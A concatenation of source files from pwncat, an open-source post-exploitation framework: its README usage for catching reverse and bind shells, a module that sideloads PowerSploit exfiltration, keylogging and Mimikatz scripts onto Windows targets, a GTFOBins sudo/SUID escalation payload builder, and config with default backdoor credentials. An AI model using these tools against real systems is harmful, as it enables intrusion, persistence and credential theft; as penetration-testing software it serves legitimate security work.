other\npost-exploitation platforms. You can utilize the familiar `run`, `search`\nand `info` commands and enter module contexts with the `use` command.\nRefer to the documentation for more information.\n\n## BlackArch Packaging\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/pwncat-caleb.svg)](https://repology.org/project/pwncat-caleb/versions)\n\nInstallation on BlackArch is as simple as:\n\n``` shell\npacman -Syu pwncat-caleb\n```\n\n### Connecting to a Victim\n\nThe command line parameters for pwncat attempt to be flexible and accept\na variety of common connection syntax. Specifically, it will try to accept\ncommon netcat and ssh like syntax. The following are all valid:\n\n```sh\n# Connect to a bind shell\npwncat-cs connect://10.10.10.10:4444\npwncat-cs 10.10.10.10:4444\npwncat-cs 10.10.10.10 4444\n# Listen for reverse shell\npwncat-cs bind://0.0.0.0:4444\npwncat-cs 0.0.0.0:4444\npwncat-cs :4444\npwncat-cs -lp 4444\n# Connect via ssh\npwncat-cs ssh://user:password@10.10.10.10\npwncat-cs user@10.10.10.10\npwncat-cs user:password@10.10.10.10\npwncat-cs -i id_rsa user@10.10.10.10\n# SSH w/ non-standard port\npwncat-cs -p 2222 user@10.10.10.10\npwncat-cs user@10.10.10.10:2222\n# Reconnect utilizing installed persistence\n#   If reconnection fails and no protocol is specified,\n#   SSH is used as a fallback.\npwncat-cs reconnect://user@10.10.10.10\npwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf\npwncat-cs user@10.10.10.10\npwncat-cs c228fc49e515628a0c13bdc4759a12bf\npwncat-cs 10.10.10.10\n```\n\nBy default, pwncat **assumes the target platform is Linux**. In order to\nconnect to a Windows reverse or bind shell, you must pass the `--platform/-m`\nargument:\n\n``` shell\npwncat-cs -m windows 10.10.10.10 4444\npwncat-cs -m windows -lp 4444\n```\n\nFor more information on the syntax and argument handling, see the\nhelp information with ``pwncat-cs --help`` or visit the [documentation].\n\n## Docker Image\n\nThe recommended installation method is a Python virtual environment. This\nprovides the easiest day-to-day usage of `pwncat`. However, there has been\ninterest in using `pwncat` from a docker image, so I have provided a\nDockerfile which provides a working `pwncat` installation. To build the image\nuse:\n\n``` shell\ndocker build -t pwncat .\n```\n\nThis will build the `pwncat` docker image with the tag "pwncat". The working\ndirectory within the container is `/work`. The entrypoint for the container\nis the `pwncat` binary. It can be used like so:\n\n``` shell\n# Connect to a bind shell at 10.0.0.1:4444\ndocker run -v "/some/directory":/work -t pwncat 10.0.0.1 4444\n```\n\nIn this example, only the files in `/some/directory` are exposed to the container.\nObviously, for upload/download, the container will only be able to see the files\nexposed through any mounted directories.\n\n## Features and Functionality\n\n`pwncat` provides two main features. At it\'s core, it\'s goal is to automatically\nsetup a remote PseudoTerminal (pty) which allows interaction with the remote\nhost much like a full SSH session. When operating in a pty, you can use common\nfeatures of your remote shell such as history, line editing, and graphical\nterminal applications.\n\nThe other half of `pwncat` is a framework which utilizes your remote shell to\nperform automated enumeration, persistence and privilege escalation tasks. The\nlocal `pwncat` prompt provides a number of useful features for standard\npenetration tests including:\n\n* File upload and download\n* Automated privilege escalation enumeration\n* Automated privilege escalation execution\n* Automated persistence installation/removal\n* Automated tracking of modified/created files\n    * `pwncat` also offers the ability to revert these remote "tampers" automatically\n\nThe underlying framework for interacting with the remote host aims to abstract\naway the underlying shell and connection method as much as possible, allowing\ncommands and plugins to interact seamlessly with the remote host.\n\nYou can learn more about interacting with `pwncat` and about the underlying framework\nin the [documentation]. If you have an idea for a new privilege escalation method\nor persistence method, please take a look at the API documentation specifically.\nPull requests are welcome!\n\n## Planned Features\n\n**pwncat** would like to be come a red team swiss army knife. Hopefully soon,\nmore features will be added.\n\n* More privilege escalation methods (sudo -u#-1 CVE, LXD containers, etc.)\n* Persistence methods (bind shell, cronjobs, SSH access, PAM abuse, etc.)\n* Aggression methods (spam randomness to terminals, flush firewall, etc.)\n* Meme methods (terminal-parrot, cowsay, wall, etc.)\n* Network methods (port forward, internet access through host, etc.)\n\n## Known Issues\n\nBecause `pwncat` is trying to abstractly interact with any shell with minimal remote system\ndependencies, there are some edge cases we have found. Where we find them, we do\neverything we can to account for them and hide them from the user. However, some have\nslipped through the cracks and been observed in the wild. When this happens, `pwncat`\nwill do whatever it can to preserve your terminal, but you may be greeted with some\npeculiar output or command failures.\n\n### BSD Support\n\nWhile BSD is a Unix-based kernel, in practice it\'s userland tools are noticeably\ndifferent from their Linux counterparts. Due to this, many of the automated\nfeatures of `pwncat` will not work or outright fail when running against a BSD\nbased target. I have tried to catch all errors or edge cases, however there are\nlikely some hiccups which haven\'t been fully tested against BSD. In any case,\nthe stabilized shell should function within a BSD environment, but I don\'t\nprovide any guarantees.\n\nIf I find some time later down the road, I may try to stabilize `pwncat` on BSD,\nbut for now my focus is on Linux-based distributions. If you\'d like to\ncontribute to making `pwncat` behave better on BSD, you are more then welcome to\nreach out or just fork the repo. As always, pull requests are welcome!\n\n[documentation]: https://pwncat.readthedocs.io/en/latest\n[pwncat-windows-c2]: https://github.com/calebstewart/pwncat-windows-c2\n[BadPotato]: https://github.com/calebstewart/pwncat-badpotato\n',
    'author': 'Caleb Stewart',
    'author_email': 'caleb.stewart94@gmail.com',
    'maintainer': None,
    'maintainer_email': None,
    'url': 'https://github.com/calebstewart/pwncat',
    'packages': packages,
    'package_data': package_data,
    'install_requires': install_requires,
    'extras_require': extras_require,
    'entry_points': entry_points,
    'python_requires': '>=3.9,<4.0',
}


setup(**setup_kwargs)



#!/usr/bin/env python3
import os.path

import pkg_resources

import pwncat
from pwncat.modules import Result, Status, Argument, BaseModule, ModuleFailed
from pwncat.platform.windows import Windows, PowershellError


class GroupInfo(Result):
    def __init__(self, name: str):
        self.name = name

    def category(self, session: "pwncat.manager.Session"):
        return "PowerSploit Module Groups"

    def title(self, session: "pwncat.manager.Session"):
        return f"[cyan]{self.name}[/cyan]"

    def __str__(self):
        return self.name


class Module(BaseModule):
    """
    Load and execute modules from the PowerSploit PowerShell library. Modules are loaded in
    groups referring to the directory structure of PowerSploit. Passing no arguments to this
    module will list all available groups. Modules are downloaded directly from GitHub and
    sideloaded to the target.

    The PowerSploit source can be seen at https://github.com/PowerShellMafia/PowerSploit
    """

    MODULES = {
        "recon": [
            "Recon/Get-ComputerDetail.ps1",
            "Recon/Get-HttpStatus.ps1",
            "Recon/Invoke-CompareAttributesForClass.ps1",
            "Recon/Invoke-Portscan.ps1",
            "Recon/Invoke-ReverseDnsLookup.ps1",
            "Recon/PowerView.ps1",
        ],
        "privesc": [
            "Privesc/PowerUp.ps1",
            "Privesc/Get-System.ps1",
        ],
        "persist": [
            "Persistence/Persistence.psm1",
        ],
        "mayhem": [
            "Mayhem/Mayhem.psm1",
        ],
        "exfil": [
            "Exfiltration/Get-GPPAutologon.ps1",
            "Exfiltration/Get-GPPPassword.ps1",
            "Exfiltration/Get-Keystrokes.ps1",
            "Exfiltration/Get-MicrophoneAudio.ps1",
            "Exfiltration/Get-TimedScreenshot.ps1",
            "Exfiltration/Get-VaultCredential.ps1",
            "Exfiltration/Invoke-CredentialInjection.ps1",
            "Exfiltration/Invoke-Mimikatz.ps1",
            "Exfiltration/Invoke-NinjaCopy.ps1",
            "Exfiltration/Invoke-TokenManipulation.ps1",
            "Exfiltration/Out-Minidump.ps1",
            "Exfiltration/VolumeShadowCopyTools.ps1",
        ],
        "exec": [
            "CodeExecution/Invoke-DllInjection.ps1",
            "CodeExecution/Invoke-ReflectivePEInjection.ps1",
            "CodeExecution/Invoke-Shellcode.ps1",
            "CodeExecution/Invoke-WmiCommand.ps1",
        ],
        "bypass": [
            "AntivirusBypass/Find-AVSignature.ps1",
        ],
        "script": [
            "ScriptModification/Out-CompressedDll.ps1",
            "ScriptModification/Out-EncodedCommand.ps1",
            "ScriptModification/Out-EncryptedScript.ps1",
            "ScriptModification/Remove-Comment.ps1",
        ],
    }
    POWERSPLOIT_URL = (
        "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/"
    )
    PLATFORM = [Windows]
    ARGUMENTS = {
        "group": Argument(
            str,
            default="list",
            help="Name of the PowerSploit module group to load (default: list groups)",
        ),
    }
    POWERUP_URL = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1"

    def run(self, session: "pwncat.manager.Session", group: str):

        # Use the result system so that other modules can query available groups
        if group == "list":
            yield from (GroupInfo(name) for name in self.MODULES.keys())
            return

        # Ensure the user selected a valid group
        if group not in self.MODULES:
            raise ModuleFailed(f"no such PowerSploit module: {group}")

        # Iterate over all sources in the group
        for url in self.MODULES[group]:
            yield Status(f"loading {url.split('/')[-1]}")

            path = pkg_resources.resource_filename(
                "pwncat", os.path.join("data/PowerSploit", url)
            )

            try:
                # Attempt to load the script in the PowerShell context.
                session.run("manage.powershell.import", path=path)
            except PowershellError as exc:
                # We failed, but continue loading other scripts. Just let the user know.
                session.log(f"while loading {url.split('/')[-1]}: {str(exc)}")



#!/usr/bin/env python3
import textwrap

from rich import box
from rich.table import Table

import pwncat
from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition, get_module_choices


class Command(CommandDefinition):
    """
    View info about a module
    """

    PROG = "info"
    ARGS = {
        "module": Parameter(
            Complete.CHOICES,
            choices=get_module_choices,
            metavar="MODULE",
            help="The module to view information on",
            nargs="?",
        )
    }

    def run(self, manager: "pwncat.manager.Manager", args):

        if not args.module and manager.config.module is None:
            console.log("[red]error[/red]: no module specified")
            return

        if args.module:
            try:
                module = next(manager.target.find_module(args.module, exact=True))
                module_name = args.module
            except StopIteration:
                console.log(f"[red]error[/red]: {args.module}: no such module")
                return
        else:
            module = manager.config.module
            module_name = module.name.removeprefix("agnostic.")
            if self.manager.target is not None:
                module_name = module_name.removeprefix(
                    self.manager.target.platform.name + "."
                )

        console.print(
            f"[bold underline]Module [cyan]{module_name}[/cyan][/bold underline]"
        )
        console.print(
            textwrap.indent(textwrap.dedent(module.__doc__.strip("\n")), " ") + "\n"
        )

        table = Table("Argument", "Default", "Help", box=box.SIMPLE)
        for arg, info in module.ARGUMENTS.items():
            if info.default is pwncat.modules.NoValue:
                default = ""
            else:
                default = info.default
            table.add_row(arg, str(default), info.help)

        console.print(table)



"""
The gtfobins module provides an abstract interface into the GTFOBins database.
The GTFOBins database maps binaries to special permissions which could be used
for privilege escalation (among other things). Internally, pwncat uses this
database to identify ways to read/write files as well as during escalation
with things like SETUID binaries and sudo rules. A full list of all supported
binaries can be seen in ``pwncat/data/gtfobins.json``.
"""
import os
import shlex
from enum import Flag, auto
from typing import IO, Any, Dict, List, Tuple, BinaryIO, Callable, Generator

import rapidjson as json


class ControlCodes:
    CTRL_C = "\x03"
    CTRL_X = "\x18"
    CTRL_R = "\x12"
    CTRL_O = "\x0F"
    CTRL_T = "\x14"
    CTRL_Z = "\x1a"
    CTRL_D = "\x04"
    ESCAPE = "\x1B"


class SudoNotPossible(Exception):
    """The given sudo command spec is not compatible with the method attempted."""


class MissingBinary(Exception):
    """A method required an external binary that didn't exist"""


class BinaryNotFound(Exception):
    """The binary asked for either doesn't provided the required functionality
    or isn't present on the remote system"""


class Capability(Flag):
    """The capabilities of a given GTFOBin Binary. A binary may have multiple
    implementations of each capability, but these flags indicate a list of all
    capabilities which a given binary supports."""

    READ = auto()
    """ File read """
    WRITE = auto()
    """ File write """
    SHELL = auto()
    """ Shell access """

    ALL = READ | SHELL | WRITE
    """ All capabilities, used for iter_* methods """
    NONE = 0
    """ No capabilities. Should never happen. """


class Stream(Flag):
    """What time of streaming data is required for a specific method."""

    RAW = auto()
    """ A raw, unencoded stream of data. If writing, this mode requires
    a ``length`` parameter to indicate how many bytes of data to transfer. """
    PRINT = auto()
    """ Supports reading/writing printable data only """
    HEX = auto()
    """ Supports reading/writing hex-encoded data """
    BASE64 = auto()
    """ Supports reading/writing base64 data """
    ANY = RAW | PRINT | HEX | BASE64
    """ Used with the iter_* methods. Shortcut for searching for any stream """
    NONE = 0
    """ No stream method. Should never happen. """


class Method:
    """Abstract method class built from the JSON database"""

    def __init__(self, binary: "Binary", cap: Capability, data: Dict[str, Any]):
        """Create a new method associated with the given binary."""

        try:
            self.stream = Stream._member_map_[data.get("stream", "PRINT").upper()]
        except KeyError:
            raise ValueError(f"invalid stream specifier: {data['stream']}")

        self.binary = binary
        self.payload = data.get("payload", "{command}")
        self.args = data.get("args", [])
        self.suid = data.get("suid", None)
        self.input = data.get("input", "")
        self.exit = data.get("exit", "")
        self.restricted = data.get("restricted", [])
        self.cap = cap

    def sudo_args(self, binary_path: str, spec: str) -> bool:
        """Check if this method is compatible with the given sudo command spec.
        It will evaluate whether there are wildcards, or if the given parameters
        satisfy the parameters needed for this method. The method returns the list
        of arguments that need to be added_lines to the sudo spec in order for it to
        run this method.

        If this method is incompatible with the given sudo spec, SudoNotPossible
        is raised. If this spec is compatible, a list of arguments which need to
        be appended to the spec is returned.
        """

        if spec == "ALL":
            # We can run anything, so just return all arguments
            return binary_path, self.args

        # Split the sudo command specification
        args = shlex.split(spec.rstrip("*"))

        # There was a " *" which is not a wildcard
        if shlex.split(spec)[-1] == "*":
            has_wildcard = False
            args.append("*")
            command = spec
        elif spec[-1] == "*":
            has_wildcard = True
            command = spec.rstrip("*")
        else:
            has_wildcard = False
            command = spec

        # The sudo command is just "/path/to/binary", we are allowed to add any
        # parameters we want.
        if len(args) == 1 and spec[-1] != " ":
            return args[0], self.args

        # Check for disallowed arguments
        for arg in args:
            if arg in self.restricted:
                raise SudoNotPossible

        # Check if we already have the parameters we need
        needed = {k: False for k in self.args}
        for arg in args:
            if arg in needed:
                needed[arg] = True

        # Check if we have any missing needed parameters, and no wildcard
        # was given
        if any([not v for _, v in needed.items()]) and not has_wildcard:
            raise SudoNotPossible

        # Either we have all the arguments we need, or we have a wildcard
        return command, [k for k, v in needed.items() if not v]

    def build_payload(
        self,
        gtfo: "GTFOBins",
        binary_path: str,
        spec: str = None,
        user: str = None,
        suid: bool = False,
        **kwargs,
    ) -> str:
        """Generate a read payload"""

        # Make sure both sudo_spec and sudo_user are provided if sudo_spec is
        assert spec is None or (spec is not None and user is not None)

        # Make sure we can use this spec, and get remaining arguments
        if spec is not None:
            command, args = self.sudo_args(binary_path, spec)
            args = gtfo.resolve_binaries(
                " ".join(args),
                ctrl_c=ControlCodes.CTRL_C,
                ctrl_z=ControlCodes.CTRL_Z,
                ctrl_x=ControlCodes.CTRL_X,
                escape=ControlCodes.ESCAPE,
                ctrl_d=ControlCodes.CTRL_D,
                ctrl_r=ControlCodes.CTRL_R,
                ctrl_o=ControlCodes.CTRL_O,
                ctrl_t=ControlCodes.CTRL_T,
                **kwargs,
            )
            command = f"sudo -u {user} " + command + " " + args
        else:
            if suid and self.suid:
                args = self.suid
            else:
                args = []
            args += self.args if self.args else []
            command = " ".join([binary_path, *args])
            # Resolve variables in the command/args
            command = gtfo.resolve_binaries(
                command,
                ctrl_c=ControlCodes.CTRL_C,
                ctrl_z=ControlCodes.CTRL_Z,
                ctrl_x=ControlCodes.CTRL_X,
                escape=ControlCodes.ESCAPE,
                ctrl_d=ControlCodes.CTRL_D,
                ctrl_r=ControlCodes.CTRL_R,
                ctrl_o=ControlCodes.CTRL_O,
                ctrl_t=ControlCodes.CTRL_T,
                **kwargs,
            )

        payload = gtfo.resolve_binaries(
            self.payload,
            command=command,
            ctrl_c=ControlCodes.CTRL_C,
            ctrl_x=ControlCodes.CTRL_X,
            ctrl_z=ControlCodes.CTRL_Z,
            escape=ControlCodes.ESCAPE,
            ctrl_d=ControlCodes.CTRL_D,
            ctrl_r=ControlCodes.CTRL_R,
            ctrl_o=ControlCodes.CTRL_O,
            ctrl_t=ControlCodes.CTRL_T,
            **kwargs,
        )

        return payload


class MethodWrapper:
    """
    Wraps a method and full binary path pair which together are capable of
    generating a payload to perform the specified capability.

    """

    def __init__(self, method: Method, binary_path: str):
        """Create a Method Wrapper which references a specific binary path.
        and method arguments."""
        self.binary_path = binary_path
        self.method = method

    def wrap_stream(self, pipe: BinaryIO) -> IO:
        """Wrap the given BinaryIO pipe with the appropriate stream wrapper
        for this method. For "RAW" or "PRINT" streams, this is a null wrapper.
        For BASE64 and HEX streams, this will automatically decode the data as
        it is streamed. Closing the wrapper will automatically close the underlying
        pipe."""

        if self.stream is Stream.RAW or self.stream is Stream.PRINT:
            return pipe
        else:
            # NOTE: we should remove these from gtfobins.json
            raise RuntimeError(
                f"{self.stream.name}: non raw or print streams are no longer supported"
            )

    def build(self, gtfo: "GTFOBins", **kwargs) -> Tuple[str, str, str]:
        """Build the payload for this method and binary path. Depending on
        capability and stream type, different named parameters are required.

        """
        return (
            self.payload(gtfo=gtfo, **kwargs),
            self.input(gtfo=gtfo, **kwargs),
            self.exit(gtfo=gtfo, **kwargs),
        )

    def payload(self, gtfo: "GTFOBins", **kwargs) -> str:
        return self.method.build_payload(gtfo, self.binary_path, **kwargs)

    def exit(self, gtfo: "GTFOBins", **kwargs) -> str:
        original = gtfo.resolve_binaries(
            self.method.exit,
            ctrl_c=ControlCodes.CTRL_C,
            ctrl_z=ControlCodes.CTRL_Z,
            ctrl_x=ControlCodes.CTRL_X,
            escape=ControlCodes.ESCAPE,
            ctrl_d=ControlCodes.CTRL_D,
            ctrl_r=ControlCodes.CTRL_R,
            ctrl_o=ControlCodes.CTRL_O,
            ctrl_t=ControlCodes.CTRL_T,
            **kwargs,
        )

        if original == "" and Capability.SHELL in self.cap:
            original = "exit\n"

        return original

    def input(self, gtfo: "GTFOBins", **kwargs) -> str:
        return gtfo.resolve_binaries(
            self.method.input,
            ctrl_c=ControlCodes.CTRL_C,
            ctrl_z=ControlCodes.CTRL_Z,
            ctrl_x=ControlCodes.CTRL_X,
            escape=ControlCodes.ESCAPE,
            ctrl_d=ControlCodes.CTRL_D,
            ctrl_r=ControlCodes.CTRL_R,
            ctrl_o=ControlCodes.CTRL_O,
            ctrl_t=ControlCodes.CTRL_T,
            **kwargs,
        )

    @property
    def stream(self) -> Stream:
        """Access this methods stream type"""
        return self.method.stream

    @property
    def cap(self) -> Capability:
        """Access this methods capabilities"""
        return self.method.cap


class Binary:
    """Encapsulates a GTFOBin and it's methods for all capabilities"""

    def __init__(self, gtfo: "GTFOBins", name: str, methods: List[Dict[str, Any]]):
        """Create a GTFOBin from the given list of capabilities"""

        # Initialize to no capabilities
        self.caps = Capability.NONE
        self.methods: List[Method] = []

        for method_data in methods:
            try:
                method_cap = Capability._member_map_[
                    method_data.get("type", "WRONG").upper()
                ]
            except KeyError:
                raise RuntimeError(f"invalid method type for {name}")

            method = Method(self, method_cap, method_data)
            self.methods.append(method)
            self.caps |= method_cap

    def iter_methods(
        self, binary_path: str, caps: Capability, stream: Stream, spec: str = None
    ):
        """Iterate over methods in this binary matching the capability and stream
        masks"""

        # Only yield results with overlapping capabilities
        if not (self.caps & caps):
            return

        for method in self.methods:
            # Ensure this method implements a requested capability
            if method.cap not in caps:
                continue
            # If we specified stream, make sure it matches
            if stream is not None and method.stream not in stream:
                continue
            # Ensure this method is capable of sudo with this spec
            try:
                if spec is not None:
                    method.sudo_args(binary_path, spec)
            except SudoNotPossible:
                continue

            try:
                yield MethodWrapper(method, binary_path)
            except (SudoNotPossible, MissingBinary):
                continue


class GTFOBins:
    """
    Wrapper around the GTFOBins database. Provides access to searching for methods
    of performing various capabilities generically. All iterations yield MethodWrapper
    objects.

    :param gtfobins: path to the gtfobins database
    :type gtfobins: str
    :param which: a callable which resolves binary basenames to full paths. A second
        parameter indicates whether the returned path should be quoted as with shlex.quote.
    :type which: Callable[[str, Optional[bool]], str]
    """

    def __init__(self, gtfobins: str, which: Callable[[str], str]):
        """Create a new GTFOBins object. This will load the JSON gtfobins data
        file specified in the `gtfobins` parameter. The `which` method is
        remembered to lookup existing binaries on the target system for later."""

        self.which = which
        self.binaries: Dict[str, Binary] = {}

        with open(gtfobins, "r") as filp:
            binary_data = json.load(filp)

        if not isinstance(binary_data, dict):
            raise ValueError("invalid gtfobins.json format (expecting dict)")

        self.parse_binary_data(binary_data)

    def parse_binary_data(self, binary_data: Dict[str, List[Dict[str, Any]]]):
        """Parse the given GTFObins binary information into the associated
        in-memory binary objects"""

        for name, data in binary_data.items():
            binary = Binary(self, name, data)
            self.binaries[name] = binary

    def iter_sudo(
        self,
        spec: str,
        caps: Capability = Capability.ALL,
        stream: Stream = None,
        **kwargs,
    ):
        """Iterate over methods which are sudo-capable w/ the given sudo spec.
        This will restrict the search to those binaries which match the given sudo
        command spec."""

        if spec != "ALL":
            # This is the harder case. We have a specific specification for the
            # command we can run.

            # If there are arguments, remove them and grab the first item, which
            # will be the path or binary name
            binary_path = shlex.split(spec.rstrip("*"))[0]

            for method in self.iter_binary(
                binary_path, caps, stream, spec=spec, **kwargs
            ):
                yield method
        else:
            # We can run any w/ this spec. This becomes the same as calling
            # iter_methods. "sudo_args" in "method" will notice this as well
            # and succeed for any command.
            yield from self.iter_methods(caps, stream, spec=spec, **kwargs)

    def find_binary(self, binary_path: str, caps: Capability = Capability.ALL):
        """Locate a binary by name. Only return a binary if the capabilities
        overlap. Raise an BinaryNotFound exception if the capabilities don't
        match or the given binary doesn't exist on the remote system."""

        binary_name = os.path.basename(binary_path)
        if binary_name not in self.binaries:
            raise BinaryNotFound

        if not (self.binaries[binary_name].caps & caps):
            raise BinaryNotFound

        return self.binaries[binary_name]

    def iter_binary(
        self,
        binary_path: str,
        caps: Capability = Capability.ALL,
        stream: Stream = None,
        spec: str = None,
    ) -> Generator[MethodWrapper, None, None]:
        """Iterate over methods for the given remote binary path. A binary will
        be located by taking the basename of the given path, and the cross-
        referencing with the given capabilities and stream types."""

        binary_name = os.path.basename(binary_path)
        if binary_name not in self.binaries:
            return

        yield from self.binaries[binary_name].iter_methods(
            binary_path, caps, stream, spec
        )

    def iter_methods(
        self,
        caps: Capability = Capability.ALL,
        stream: Stream = None,
        spec: str = None,
    ) -> Generator[MethodWrapper, None, None]:
        """Iterate over methods which provide the given capabilities"""

        for name, binary in self.binaries.items():
            path = self.which(name)

            # Only yield results applicable to the target system
            if path is None:
                continue

            yield from binary.iter_methods(path, caps, stream, spec)

    def resolve_binaries(self, target: str, **args):
        """resolve any missing binaries with the self.which method"""

        while True:
            try:
                return target.format(**args)
            except ValueError as exc:
                raise ValueError(target) from exc
            except KeyError as exc:
                # The keyerror has the name in quotes for some reason
                key = shlex.split(str(exc))[0]

                quote = True
                if key.startswith("unquote_"):
                    key = key.split("unquote_")[1]
                    quote = False
                # Find the remote binary that matches
                value = self.which(key, quote=quote)
                # Whoops! No dependency
                if value is None:
                    raise MissingBinary(key)
                # Next time, we have it
                args[key] = value



#!/usr/bin/env python3
import textwrap

from rich import box
from rich.table import Table, Column

import pwncat
from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    View info about a module
    """

    PROG = "search"
    ARGS = {
        "module": Parameter(
            Complete.NONE,
            help="glob pattern",
        )
    }

    def run(self, manager: "pwncat.manager.Manager", args):

        modules = list(manager.target.find_module(f"*{args.module}*"))
        min_width = max(
            len(module.name.removeprefix("agnostic.")) for module in modules
        )

        table = Table(
            Column(header="Name", style="cyan", min_width=min_width),
            Column(header="Description"),
            title="Results",
            box=box.MINIMAL_DOUBLE_HEAD,
            expand=True,
        )

        for module in modules:
            # Rich will ellipsize the column, but we need to squeeze
            # white space and remove newlines. `textwrap.shorten` is
            # the easiest way to do that, so we use a large size for
            # width.
            description = module.__doc__ if module.__doc__ is not None else ""
            module_name = module.name.removeprefix("agnostic.")

            if self.manager.target is not None:
                module_name = module_name.removeprefix(
                    self.manager.target.platform.name + "."
                )

            table.add_row(
                f"[cyan]{module_name}[/cyan]",
                textwrap.shorten(
                    description.replace("\n", " "), width=80, placeholder="..."
                ),
            )

        console.print(table)



"""
This module houses the core pwncat configuration classes. pwncat configuration
is not free-form. There are a specific set of known configuration names which
can be set, and each one has a specific type. Type-checking is done at assignment
by executing the callable used as the type for a given configuration. Configuration
types generally do a good job of converting strings from the interactive promp to
legitimate values for the configuration being modified. If it cannot be converted,
a ``ValueError`` is raised.

There is currently no way to augment the configuration items exposed by pwncat.
This may be added in the future, but currently, any configuration should be
specific to your module or command.

.. note::

   If a module requires an argument which matches the name of a global configuration,
   the value from the global configuration will be used as the default. This can be
   used, for example, to automatically utilize the global values for backdoor users
   or keys in your modules as configured by the user and decrease the number of
   required parameters to a module.

"""
import os
import copy
import ipaddress
from typing import Any, Dict, Union

from prompt_toolkit.keys import ALL_KEYS, Keys
from prompt_toolkit.input.ansi_escape_sequences import REVERSE_ANSI_SEQUENCES

from pwncat.modules import BaseModule


def key_type(value: str) -> bytes:
    """Converts a key name to a ansi keycode. The value can either be a single
    printable character or a named key from prompt_toolkit Keys"""
    if len(value) == 1:
        return value.encode("utf-8")
    if value not in ALL_KEYS:
        raise ValueError(f"invalid key: {value}")
    key = [key for key in Keys if key.value == value][0]
    return REVERSE_ANSI_SEQUENCES[key].encode("utf-8")


class KeyType:
    def __init__(self, name: str):
        if len(name) == 1:
            self.value = name.encode("utf-8")
        else:
            if name not in ALL_KEYS:
                raise ValueError(f"{name}: invalid key")
            key = [key for key in Keys if key.value == name][0]
            self.value = REVERSE_ANSI_SEQUENCES[key].encode("utf-8")
        self.name = name

    def __repr__(self):
        return f"Key(name={repr(self.name)})"

    def __bytes__(self):
        return self.value


def local_file_type(value: str) -> str:
    """Ensure the local file exists"""
    if not os.path.isfile(value):
        raise ValueError(f"{value}: no such file or directory")
    return value


def local_dir_type(value: str) -> str:
    """Ensure the path specifies a local directory"""

    # Expand ~ in the path
    value = os.path.expanduser(value)

    if not os.path.isdir(value):
        raise ValueError(f"{value}: no such file or directory")
    return value


def bool_type(value: str) -> bool:

    if isinstance(value, bool):
        return value

    value = value.lower()
    if value == "1" or value == "true" or value == "on":
        return True
    elif value == "0" or value == "false" or value == "off":
        return False

    raise ValueError(f"{value}: expected boolean value")


class Config:
    def __init__(self):

        # Basic key-value store w/ typing
        self.values: Dict[str, Dict[str, Any]] = {
            "lhost": {
                "value": ipaddress.ip_address("127.0.0.1"),
                "type": ipaddress.ip_address,
            },
            "prefix": {"value": KeyType("c-k"), "type": KeyType},
            "privkey": {"value": "data/pwncat", "type": local_file_type},
            "backdoor_user": {"value": "pwncat", "type": str},
            "backdoor_pass": {"value": "pwncat", "type": str},
            "on_load": {"value": "", "type": str},
            "db": {"value": "memory://", "type": str},
            "cross": {"value": None, "type": str},
            "psmodules": {"value": ".", "type": local_dir_type},
            "verbose": {"value": False, "type": bool_type},
            "plugin_path": {
                "value": "~/.local/share/pwncat",
                "type": local_dir_type,
            },
        }

        # Locals are set per-used-module
        self.locals: Dict[str, Any] = {}
        self.module: BaseModule = None

        # Map ascii escape sequences or printable bytes to lists of commands to
        # run.
        self.bindings: Dict[KeyType, str] = {
            KeyType("c-d"): "pass",
            KeyType("s"): "sync",
            KeyType("c"): "set state command",
        }

    def copy(self) -> "Config":
        """Copy this configuration object exactly. This is mainly used
        to allow for the possibility of running modules in the background
        without being affected by future configuration changes."""

        new = Config()

        new.values = copy.copy(self.values)
        new.locals = copy.copy(self.locals)
        new.module = self.module
        new.bindings = copy.copy(self.bindings)

        return new

    def binding(self, name_or_value: Union[str, bytes]) -> str:
        """Get a key binding by it's key name or key value."""

        if isinstance(name_or_value, bytes):
            binding = [
                b for key, b in self.bindings.items() if key.value == name_or_value
            ]
            if not binding:
                raise KeyError("no such key binding")
            return binding[0]

        key = KeyType(name_or_value)
        return self.bindings[key]

    def set(self, name: str, value: Any, glob: bool = False):
        """Set a config value"""

        if (
            (glob and name not in self.values)
            or (name not in self.values and self.module is None)
            or (
                self.module is not None
                and name not in self.values
                and name not in self.module.ARGUMENTS
            )
        ):
            raise KeyError(f"{name}: no such configuration value")

        if glob or self.module is None or name not in self.module.ARGUMENTS:
            self.values[name]["value"] = self.values[name]["type"](value)
        else:
            self.locals[name] = self.module.ARGUMENTS[name].type(value)

    def get(self, name: str, default=None):
        """get a value"""

        try:
            return self[name]
        except KeyError:
            return default

    def use(self, module: BaseModule):
        """Use the specified module. This clears the current
        locals configuration."""

        self.locals = {}
        self.module = module

    def back(self):
        """Remove the currently used module and clear locals"""

        self.locals = {}
        self.module = None

    def __getitem__(self, name: str) -> Any:
        """Get a configuration item"""

        if name in self.locals:
            return self.locals[name]

        return self.values[name]["value"]

    def __setitem__(self, name: str, value: Any):
        """Set a configuration item"""
        return self.set(name, value, glob=False)

    def __iter__(self):
        # NOTE - this is bad. We should deconflict
        yield from self.values
        yield from self.locals



from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):

    PROG = "shortcut"
    ARGS = {
        "prefix": Parameter(
            Complete.NONE, help="the prefix character used for the shortcut"
        ),
        "command": Parameter(Complete.NONE, help="the command to execute"),
    }
    LOCAL = True

    def run(self, manager, args):

        for command in manager.parser.commands:
            if command.PROG == args.command:
                manager.parser.shortcuts[args.prefix] = command
                return

        self.parser.error(f"{args.command}: no such command")
